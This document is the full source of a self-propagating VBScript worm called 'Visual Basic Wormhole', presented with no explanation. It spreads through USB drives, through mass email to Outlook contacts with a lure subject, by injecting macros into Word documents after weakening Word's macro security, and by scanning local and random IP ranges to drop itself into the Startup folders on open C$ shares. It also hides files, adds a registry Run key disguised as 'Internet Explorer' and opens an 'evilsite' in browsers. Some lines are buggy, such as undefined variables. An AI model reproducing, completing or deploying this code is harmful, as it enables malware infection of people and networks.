Visual Basic Wormhole

1. Set WshShell=WScript.CreateObject("WScript.Shell")
2. Set objFSO = CreateObject("Scripting.FileSystemObject")
3. ScriptPath = WScript.ScriptFullName
4. On Error Resume Next
5. Function Install()
6. objFSO.CopyFile ScriptPath, "C:\Users\Public\"
7. X = objFSO.CopyFile(ScriptPath, Path & "\", True)
8. Set dc = fs.Drives
9. For Each d in dc
10. If (d.DriveType = 1) Then
11. s = d.DriveLetter
12. X = fs.CopyFile(ScriptPath, s & ":\", True)
13. Else
14. End If
15. Next
16. WshShell.Run "taskkill /f /im winword.exe",0,False
17. WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\Security\VBAWarnings","00000000","REG_DWORD"
18. WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\Security\Level","00000000","REG_DWORD"
19. Const cHKLM = &H80000002
20. Const cComp = "."
21. Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & cComp & "\root\default:StdRegProv")
22. strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
23. strValueName = "Internet Explorer"
24. strValue = ScriptPath
25. objReg.SetStringValue cHKLM, strKeyPath, strValueName, strValue
26. End Function
27. Function Outlook()
28. Set objOutlook = CreateObject("Outlook.Application")
29. Set objMail = objOutlook.CreateItem(0)
30. Const olFolderContacts = 10
31. Set objOutlook = CreateObject("Outlook.Application")
32. Set objNamespace = objOutlook.GetNamespace("MAPI")
33. Set objFolder = objNamespace.GetDefaultFolder(olFolderContacts)
34. Set objList = objFolder.Items()
35. For i = 1 to objList.MemberCount
36. Set objMember = objList.GetMember(i)
37. objMail.Recipients.Add(objMember.Address)
38. Next
39. objMail.Subject = "Here's that file you asked for"
40. objMail.Attachments.Add(ScriptPath)
41. objMail.Send
42. objOutlook.Quit
43. Set objMail = Nothing
44. Set objOutlook = Nothing
45. End Function
46. Function Word(objStartFolder)
47. Set objFolder = objFSO.GetFolder(objStartFolder)
48. Set colFiles = objFolder.Files
49. For Each objFile in colFiles
50. strFileName = objFile.Name
51. If objFSO.GetExtensionName(strFileName) = "docx" Or objFSO.GetExtensionName(strFileName) = "doc" Then
52. Set wdApp = CreateObject("Word.Application")
53. Set wdDoc = wdApp.Documents.Open(objFSO.GetAbsolutePathName(objFile.Name))
54. Set xlmodule = wdDoc.VBProject.VBComponents.Add(1)
55. Set objTextFile = objFSO.OpenTextFile(ScriptPath, 1)
56. strCode = objTextFile.ReadAll
57. objTextFile.Close
58. xlmodule.CodeModule.AddFromString strCode
59. WshShell.Run "ATTRIB.exe +S +H "& Chr(34) & objFSO.GetAbsolutePathName(objFile.Name) & Chr(34),0,False
60. wdDoc.SaveAs objFSO.GetAbsolutePathName(objFile.Name) & ".docm", 13
61. wdDoc.Close
62. wdApp.Quit
63. End If
64. Next
65. Word objFSO.GetFolder(objStartFolder)
66. End Function
67. Function Run()
68. WshShell.Run "ATTRIB.exe +S +H " & Chr(34) & ScriptPath & Chr(34),0,False
69. WshShell.Run "chrome.exe evilsite",0,False
70. WshShell.Run "firefox.exe evilsite",0,False
71. End Function
72. Function GetIP()
73. dim NIC1, Nic, StrIP, CompName
74. Set NIC1 = GetObject("winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
75. For Each Nic in NIC1
76. If Nic.IPEnabled Then
77. StrIP = Nic.IPAddress(i)
78. End If
79. Next
80. GetIP = StrIP
81. End Function
82. Function Network()
83. On Error Resume Next
84. IPRange = Split(GetIP(), ".")
85. IPRange(3) = ""
86. IPRange = Join(IPRange, ".")
87. Do
88. i = i + 1
89. pingSuccessful = wshShell.run("ping -n 1 -w 1000 " & IPRange & i,0,True)
90.  
91. If pingSuccessful = 0 Then
92. WshShell.Run "NET USE Z: \\" & IPRange & i & "\C$ /user:Guest Guest /Y",0,True
93. Dim fs, f, f1, fc, s
94. Set fs = CreateObject("Scripting.FileSystemObject")
95. Set f = fs.GetFolder("Z:\Users")
96. Set fc = f.SubFolders
97. For Each f1 in fc
98. objFSO.CopyFile ScriptPath, "Z:\Users\" & f1.name & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
99. Next
100. WshShell.Run "MOUNTVOL Z: /d",0,True
101. End If
102. Loop While i < 256
103. End Function
104. Function GetRndIP()
105. Dim max,min
106. max=255
107. min=1
108. Randomize
109. GetRndIP = Int((max-min+1)*Rnd+min) & "." & Int((max-min+1)*Rnd+min) & "." & Int((max-min+1)*Rnd+min) & "." & Int((max-min+1)*Rnd+min)
110. End Function
111. Function NetworkRemote()
112. On Error Resume Next
113. IPRange = Split(GetRndIP(), ".")
114. IPRange(3) = ""
115. IPRange = Join(IPRange, ".")
116. Do
117. i = i + 1
118. pingSuccessful = wshShell.run("ping -n 1 -w 1000 " & IPRange & i,0,True)
119.  
120. If pingSuccessful = 0 Then
121. WshShell.Run "NET USE Z: \\" & IPRange & i & "\C$ /user:Guest Guest /Y",0,True
122. Dim fs, f, f1, fc, s
123. Set fs = CreateObject("Scripting.FileSystemObject")
124. Set f = fs.GetFolder("Z:\Users")
125. Set fc = f.SubFolders
126. For Each f1 in fc
127. objFSO.CopyFile ScriptPath, "Z:\Users\" & f1.name & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
128. Next
129. WshShell.Run "MOUNTVOL Z: /d",0,True
130. End If
131. Loop While i < 256
132. End Function
133. Function Finish()
134. Network
135. NetworkRemote
136. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Desktop"
137. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Documents"
138. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Music"
139. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Pictures"
140. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Videos"
141. Word WshShell.ExpandEnvironmentStrings("%USERPROFILE%") & "\Downloads"
142. Outlook
143. Install
144. Run
145. End Function
146. Finish